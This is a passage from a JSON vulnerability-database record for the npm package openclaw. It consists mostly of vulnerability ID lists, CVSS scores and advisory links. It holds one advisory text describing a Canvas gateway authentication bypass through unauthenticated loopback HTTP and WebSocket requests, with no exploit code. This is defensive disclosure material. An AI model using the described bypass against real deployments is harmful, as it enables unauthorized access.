ID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["CVE-2026-27183","GHSA-r6qf-8968-wj9q"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8v2w-jgh7-6ybq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89569?format=json","vulnerability_id":"VCID-8z7r-a8dv-eueb","summary":"Duplicate Advisory: OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6mqc-jqh6-x8fc. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains an authentication bypass vulnerability in the Canvas gateway where authorizeCanvasRequest() unconditionally allows local-direct requests without validating bearer tokens or canvas capabilities. Attackers can send unauthenticated loopback HTTP and WebSocket requests to Canvas routes to bypass authentication and gain unauthorized access.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"},{"reference_url":"https://github.com/advisories/GHSA-9gvx-vj57-vqqx","reference_id":"GHSA-9gvx-vj57-vqqx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9gvx-vj57-vqqx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID